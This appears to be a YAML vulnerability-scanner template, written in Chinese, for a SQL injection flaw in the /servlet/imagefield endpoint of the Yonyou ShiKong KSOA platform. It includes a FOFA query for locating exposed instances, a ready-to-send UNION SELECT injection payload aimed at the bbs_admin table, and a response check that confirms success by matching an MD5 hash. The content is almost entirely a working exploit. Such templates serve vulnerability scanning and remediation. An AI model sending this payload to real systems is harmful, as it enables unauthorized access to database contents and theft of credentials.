product: 用友时空KSOA
vName: 用友时空KSOA imagefield接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友时空KSOA平台 /servlet/imagefield 存在SQL注入漏洞，攻击者可利用该漏洞获取数据库敏感信息
version: ''
note: ''
search:
  FOFA: app="用友-时空KSOA"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17684767.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5',123456))--+
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and